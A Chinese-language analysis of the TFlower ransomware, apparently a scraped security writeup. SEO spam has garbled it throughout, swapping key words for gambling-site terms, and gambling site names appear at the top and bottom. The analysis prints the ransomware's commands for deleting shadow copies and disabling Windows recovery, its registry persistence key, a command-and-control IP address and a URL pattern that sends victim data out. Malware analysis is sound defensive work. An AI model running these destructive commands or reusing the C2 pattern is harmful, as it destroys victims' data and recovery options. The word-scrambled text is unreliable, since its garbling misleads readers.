攻击目标主要为千亿网络的千亿体育——TFlower_qy88VIP千亿体育 攻击目标主要为千亿网络的千亿体育——TFlower_qy88VIP千亿体育

qy88VIP千亿体育

攻击目标主要为千亿网络的千亿体育——TFlower

2019-11-06   

千亿网站:★★★★
TFlower千亿体育主要锁定千亿环境,通过未得到安全保护的远程桌面服务(RDP)传播。一旦攻击者获得对目标机器的访问权限,就会使用PowerShell Empire、PSExec等工具遍历千亿网络。

背景介绍

TFlower千亿体育。

目标锁定千亿环境的最新千亿软件被命名为“TFlower”,该体育正通过未得到安全保护的远程桌面服务(RDP)传播。一旦攻击者获得对目标机器的访问权限,就会使用PowerShell Empire、PSExec等工具遍历千亿网络,也就是说,它是在攻击者通过RDP服务侵入受害者电脑后手动安装的。

据外媒BleepingComputer报道,这种新型千亿软件实际上是由白帽黑客GrujaRS在上个月初发现的,但直到最近才开始大规模爆发,一些千亿和政府机构已经遭到感染。

图:千亿背景

体育网站完体育后会弹出千亿框,目前尚不清楚该千亿软件的具体赎金金额:

图:千亿框

体育运行后,会高调运行控制台程序,并将网站过程显示出来:

图:体育运行过程显示

该体育会网站几乎所有体育类型(.dll除外),网站后的体育名和后缀名不变,而是在体育内容头部添加*tflower标记和经过网站的密钥数据:

图:被网站体育结构

体育MD5:53C923D4E39B966AB951F9A3B9D090BE

千亿网站:★★★★

体育演示视频

技术分析

· 枚举千亿

查找并杀死Outlook.exe千亿,以便允许打开其数据体育进行网站。

图:查杀指定千亿

· 注册表操作

体育为了长期驻留,将自身添加在启动项中'Software\Microsoft\Windows\CurrentVersion\Run\proxycap'

图:注册表添加启动项

· 关闭恢复功能

清空磁盘回收站,并尝试删除卷影副本、执行禁用Windows 10修复环境的命令。

vssadmin.exe delete shadows /all /quiet
bcdedit.exe /set {default} recoveryenabled no
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {current} recoveryenabled no
bcdedit.exe /set {current} bootstatuspolicy ignoreallfailures
图:关闭恢复功能

· 网络操作

创建线程与C&C服网站进行通讯,连接至 89.46.108.47:443或者89.46.108.47:80,将受害电脑名及体育运行状态进行上传,其中状态分为'start'、'success %lld, retry %lld'、'End %lld' 上传数据格式为:https://www.adamaitalycup.it/wp-includes/wp-merge.phphtml?name=[computer_name]&state=运行状态

图:上传信息

· 体育操作

遍历体育时跳过指定目录体育:'sample music'、'windows'、'!_Notice__!.txt'

图:遍历体育

选择被网站体育时跳过自身以及后缀名为.dll的体育:

图:选择体育类型

体育会网站体育的全部数据,同时在体育内容头部添加*tflower标记、体育大小以及经过网站的密钥数据:

图:网站体育结构

· 网站算法

体育网站算法采用AES-256-CBC算法,其中key、IV采用RSA-512公钥进行网站,存储在被网站体育头部,而RSA公钥采用十六进制转字符串方式硬编码在体育体育中。

图:网站算法为aes-256-cbc

硬编码的RSA公钥转换前(1024字节):

图:RSA公钥转码前

通过字符串转十六进制后的公钥数据(512字节):

图:RSA-512公钥

防范措施

  1. 不下载可疑邮件附件
  2. 浏览网页时不下载运行可疑程序
  3. 及时更新系统补丁
  4. 不适用弱口令密码
  5. 安装杀毒软件
  6. 安装千亿体育防御软件
编辑:瑞瑞 阅读:
竞技宝导航千亿国际手机官网app国际龙8国际